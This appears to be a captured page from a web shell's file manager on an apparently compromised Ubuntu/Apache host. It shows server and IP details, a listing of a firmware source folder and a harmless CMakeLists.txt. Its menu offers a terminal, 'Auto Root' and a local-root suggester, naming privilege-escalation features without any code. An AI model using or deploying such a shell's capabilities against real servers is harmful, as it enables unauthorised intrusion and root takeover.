Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
firmware /
carl9170fw /
Delete
Unzip
Name
Size
Permission
Date
Action
carlfw
[ DIR ]
drwxr-xr-x
2020-05-07 07:38
config
[ DIR ]
drwxr-xr-x
2020-05-07 07:38
extra
[ DIR ]
drwxr-xr-x
2020-05-07 07:38
include
[ DIR ]
drwxr-xr-x
2016-11-15 23:07
minifw
[ DIR ]
drwxr-xr-x
2020-05-07 07:38
toolchain
[ DIR ]
drwxr-xr-x
2020-05-07 07:38
tools
[ DIR ]
drwxr-xr-x
2020-05-07 07:38
CMakeLists.txt
416
B
-rw-r--r--
2020-04-14 09:21
COPYRIGHT
922
B
-rw-r--r--
2020-04-14 09:21
GPL
17.57
KB
-rw-r--r--
2020-04-14 09:21
Kconfig
115
B
-rw-r--r--
2020-04-14 09:21
README
882
B
-rw-r--r--
2020-04-14 09:21
autogen.sh
659
B
-rwxr-xr-x
2020-04-14 09:21
genapi.sh
390
B
-rwxr-xr-x
2020-04-14 09:21
Save
Rename
cmake_minimum_required(VERSION 2.8) project(carl9170) #if you don't want the full compiler output, remove the following line #set(CMAKE_VERBOSE_MAKEFILE ON) include("config.cmake") add_subdirectory(carlfw) if (CONFIG_CARL9170FW_BUILD_MINIBOOT) add_subdirectory(minifw) endif (CONFIG_CARL9170FW_BUILD_MINIBOOT) if (CONFIG_CARL9170FW_BUILD_TOOLS) add_subdirectory(tools) endif (CONFIG_CARL9170FW_BUILD_TOOLS)